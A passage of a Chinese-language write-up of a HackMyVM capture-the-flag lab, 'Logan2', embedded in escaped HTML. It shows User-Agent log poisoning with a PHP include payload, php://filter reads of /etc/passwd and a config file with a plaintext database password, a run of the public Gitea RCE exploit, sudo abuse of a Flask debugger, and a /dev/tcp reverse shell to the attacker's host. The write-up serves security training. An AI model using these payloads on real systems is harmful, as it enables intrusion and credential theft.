Firefox\/115.0&quot;\n........<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u4f2a\u534f\u8bae\u8fdb\u884c\u8bfb\u53d6\uff0c\u4f46\u662f\u5931\u8d25\u4e86\u3002<\/p>\n<p>\u5c1d\u8bd5\u4fee\u6539<code>user-agent<\/code>\u4f20\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241781.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241781.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417205805289\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241782.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241782.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417205941466\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u7981\u7528\u51fd\u6570\uff1a<\/p>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>include()<\/code>\u8fdb\u884c\u7ed5\u8fc7\uff1a<\/p>\n<pre><code class=\"language-bash\">User-Agent:&lt;?php include($_GET[&#039;hack&#039;]);?&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241784.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241784.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417210656146\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">http:\/\/newsitelogan.logan.hmv\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&amp;hack=..\/..\/..\/..\/..\/..\/etc\/passwd\n&lt;?php include($_GET[&#039;hack&#039;]);?&gt;<\/code><\/pre>\n<p>\u5c1d\u8bd5\u83b7\u53d6\u914d\u7f6e\u6587\u4ef6\uff0c\u56e0\u4e3a\u4e00\u5206\u949f\u6e05\u7406\u4e00\u6b21\uff0c\u6240\u4ee5\u8981\u4e00\u6c14\u5475\u6210\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/newsitelogan.logan.hmv\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&amp;hack=php:\/\/filter\/convert.base64-encode\/resource=\/etc\/passwd<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241785.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241785.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628215205622\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjQyOjY1NTM0Ojovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4Kbm9ib2R5Ong6NjU1MzQ6NjU1MzQ6bm9ib2R5Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLW5ldHdvcms6eDo5OTg6OTk4OnN5c3RlbWQgTmV0d29yayBNYW5hZ2VtZW50Oi86L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMDoxMDc6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgphdmFoaS1hdXRvaXBkOng6MTAxOjEwODpBdmFoaSBhdXRvaXAgZGFlbW9uLCwsOi92YXIvbGliL2F2YWhpLWF1dG9pcGQ6L3Vzci9zYmluL25vbG9naW4KbG9nYW46eDoxMDAwOjEwMDA6bG9nYW4sLCw6L2hvbWUvbG9nYW46L2Jpbi9iYXNoCnNzaGQ6eDoxMDI6NjU1MzQ6Oi9ydW4vc3NoZDovdXNyL3NiaW4vbm9sb2dpbgpteXNxbDp4OjEwMzoxMTI6TXlTUUwgU2VydmVyLCwsOi9ub25leGlzdGVudDovYmluL2ZhbHNlCmdpdDp4OjEwNDoxMTM6R2l0IFZlcnNpb24gQ29udHJvbCwsLDovaG9tZS9naXQ6L2Jpbi9iYXNoCmtldmluOng6MTAwMToxMDAxOmtldmluLCwsOi9ob21lL2tldmluOi9iaW4vYmFzaAo<\/code><\/pre>\n<pre><code class=\"language-text\">root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:108:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nlogan:x:1000:1000:logan,,,:\/home\/logan:\/bin\/bash\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:103:112:MySQL Server,,,:\/nonexistent:\/bin\/false\ngit:x:104:113:Git Version Control,,,:\/home\/git:\/bin\/bash\nkevin:x:1001:1001:kevin,,,:\/home\/kevin:\/bin\/bash<\/code><\/pre>\n<p>\u8bf4\u660e\u662f\u6709\u7528\u7684\uff0c\u5c1d\u8bd5<code>php_filter<\/code>\u94fe\u7684\u5229\u7528\uff0c\u4f46\u662f\u6ca1\u80fd\u5f39\u56de\u53bb\u3002\u67e5\u770b\u662f\u5426\u5b58\u5728\u5176\u4ed6\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/newsitelogan.logan.hmv\/photos-website-logan.php?photo=..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&amp;hack=php:\/\/filter\/convert.base64-encode\/resource=config.php<\/code><\/pre>\n<pre><code class=\"language-text\">PD9waHAKCQoJJHNlcnZlcm5hbWUgPSAibG9jYWxob3N0IjsKCSR1c2VybmFtZSA9ICJsb2dhbiI7CgkkcGFzc3dvcmQgPSAiU3VwZXJfbG9nYW4xMjM0IjsKCSRkYm5hbWUgPSAibG9nYW4iOwoKCS8vIENyZWF0ZSBjb25uZWN0aW9uCgkkY29ubiA9IG5ldyBteXNxbGkoJHNlcnZlcm5hbWUsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGJuYW1lKTsKCS8vIENoZWNrIGNvbm5lY3Rpb24KCWlmICgkY29ubi0+Y29ubmVjdF9lcnJvcikgewoJICBkaWUoIkNvbm5lY3Rpb24gZmFpbGVkOiAiIC4gJGNvbm4tPmNvbm5lY3RfZXJyb3IpOwoJfQoKPz4K<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\n\n    $servername = &quot;localhost&quot;;\n    $username = &quot;logan&quot;;\n    $password = &quot;Super_logan1234&quot;;\n    $dbname = &quot;logan&quot;;\n\n    \/\/ Create connection\n    $conn = new mysqli($servername, $username, $password, $dbname);\n    \/\/ Check connection\n    if ($conn-&gt;connect_error) {\n      die(&quot;Connection failed: &quot; . $conn-&gt;connect_error);\n    }\n\n?&gt;<\/code><\/pre>\n<h3>\u767b\u5f55<\/h3>\n<p>\u83b7\u5f97\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-tip\">logan\nSuper_logan1234<\/code><\/pre>\n<p>\u5c1d\u8bd5\u767b\u5f55\u5176<code>3000<\/code>\u7aef\u53e3\uff0c\u770b\u770b\u53ef\u4ee5\u767b\u5f55\u3002\u987a\u4fbf\u6d4b\u4e00\u4e0bssh\uff0c\u53d1\u73b0\u53ef\u4ee5\u6b63\u5e38\u767b\u5f55\u5230\u7aef\u53e3\u670d\u52a1\u4e2d\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241786.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241786.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628220324749\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u770b\u6709\u6ca1\u6709\u5730\u65b9\u53ef\u4ee5\u53cd\u5f39\u4e00\u4e2ashell\u56de\u6765\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241787.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241787.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628220812389\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5728<code>8000<\/code>\u7aef\u53e3\u6258\u7ba1\u4e86\u4e00\u4e2a\u670d\u52a1\u3002<\/p>\n<h3>\u65b9\u6cd5\u4e00\uff1agit\u4efb\u52a1\u53cd\u5f39shell<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241788.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241788.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628221315598\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u968f\u4fbf\u66f4\u65b0\u4e00\u4e0b\uff0c\u8fdb\u884c\u89e6\u53d1\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241789.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241789.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628221415937\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241790.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241790.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628221427819\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u65b9\u6cd5\u4e8c\uff1agitea\u7248\u672c\u6f0f\u6d1e<\/h3>\n<p>\u53ef\u4ee5\u6784\u9020\u62a5\u9519\u6216\u8005\u76f4\u63a5\u67e5\u627e\u76f8\u5173\u7248\u672c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241791.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241791.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628223414757\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u627e\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ searchsploit gitea 1.12            \n-------------------------------------------------------------------------------------------------------------------------- \nExploit Title                                                                                  |  Path\n--------------------------------------------------------------------------------------------------------------------------\nGitea 1.12.5 - Remote Code Execution (Authenticated)                                           |multiple\/webapps\/49571.py\n-------------------------------------------------------------------------------------------------------------------------- \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ searchsploit -m multiple\/webapps\/49571.py\n  Exploit: Gitea 1.12.5 - Remote Code Execution (Authenticated)\n      URL: https:\/\/www.exploit-db.com\/exploits\/49571\n     Path: \/usr\/share\/exploitdb\/exploits\/multiple\/webapps\/49571.py\n    Codes: N\/A\n Verified: False\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/Logan2\/49571.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ git config --global user.email &quot;hack@whoami.com&quot; \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ git config --global user.name &quot;whoami&quot;         \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan2]\n\u2514\u2500$ python3 49571.py -t http:\/\/192.168.0.145:3000 -u logan -p Super_logan1234 -I 192.168.0.143 -P 1234\n    _____ _ _______\n   \/ ____(_)__   __|             CVE-2020-14144\n  | |  __ _   | | ___  __ _\n  | | |_ | |  | |\/ _ \\\/ _` |     Authenticated Remote Code Execution\n  | |__| | |  | |  __\/ (_| |\n   \\_____|_|  |_|\\___|\\__,_|     GiTea versions &gt;= 1.1.0 to &lt;= 1.12.5\n\n[+] Starting exploit ...\nhint: Using &#039;master&#039; as the name for the initial branch. This default branch name\nhint: is subject to change. To configure the initial branch name to use in all\nhint: of your new repositories, which will suppress this warning, call:\nhint: \nhint:   git config --global init.defaultBranch &lt;name&gt;\nhint: \nhint: Names commonly chosen instead of &#039;master&#039; are &#039;main&#039;, &#039;trunk&#039; and\nhint: &#039;development&#039;. The just-created branch can be renamed via this command:\nhint: \nhint:   git branch -m &lt;name&gt;\nInitialized empty Git repository in \/tmp\/tmp.xppUWOpuwp\/.git\/\n[master (root-commit) 3d511e9] Initial commit\n 1 file changed, 1 insertion(+)\n create mode 100644 README.md\nEnumerating objects: 3, done.\nCounting objects: 100% (3\/3), done.\nWriting objects: 100% (3\/3), 238 bytes | 238.00 KiB\/s, done.\n[+] Exploit completed !<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241792.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241792.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628224053707\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u540c\u6837\u53ef\u4ee5\u62ff\u5230\u7528\u6237\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<pre><code class=\"language-bash\">(remote) git@logan2:\/home\/git\/gitea-repositories\/logan\/future_web.git$ cd ~\n(remote) git@logan2:\/home\/git$ whoami;id\ngit\nuid=104(git) gid=113(git) groups=113(git)\n(remote) git@logan2:\/home\/git$ sudo -l\nMatching Defaults entries for git on logan2:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser git may run the following commands on logan2:\n    (ALL) NOPASSWD: \/usr\/bin\/python3 \/opt\/app.py\n(remote) git@logan2:\/home\/git$ cd \/opt\nbash: cd: \/opt: Permission denied\n(remote) git@logan2:\/home\/git$ sudo \/usr\/bin\/python3 \/opt\/app.py\n * Serving Flask app &#039;app&#039;\n * Debug mode: on\nWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8000\n * Running on http:\/\/192.168.0.145:8000\nPress CTRL+C to quit\n * Restarting with stat\n * Debugger is active!\n * Debugger PIN: 100-395-477<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241793.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241793.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628221911903\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Debugger+SSTI<\/h3>\n<p>\u7136\u540e\u6253\u5f00<code>debugger<\/code>\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.145:8000\/console<\/code><\/pre>\n<p>\u6ca1\u6709\u8fc7\u6ee4\u5565\u7cfb\u7edf\u547d\u4ee4\uff0c\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">__import__(&#039;os&#039;).popen(&#039;whoami&#039;).read();<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241794.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241794.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628222859864\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u6b63\u5e38\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n<pre><code class=\"language-bash\">__import__(&#039;os&#039;).popen(&#039;bash -c &quot;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.0.143\/2345 &lt;&amp;1&quot;&#039;).read();<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241795.png'><img class=\"lazyload lazyload-style-2\" 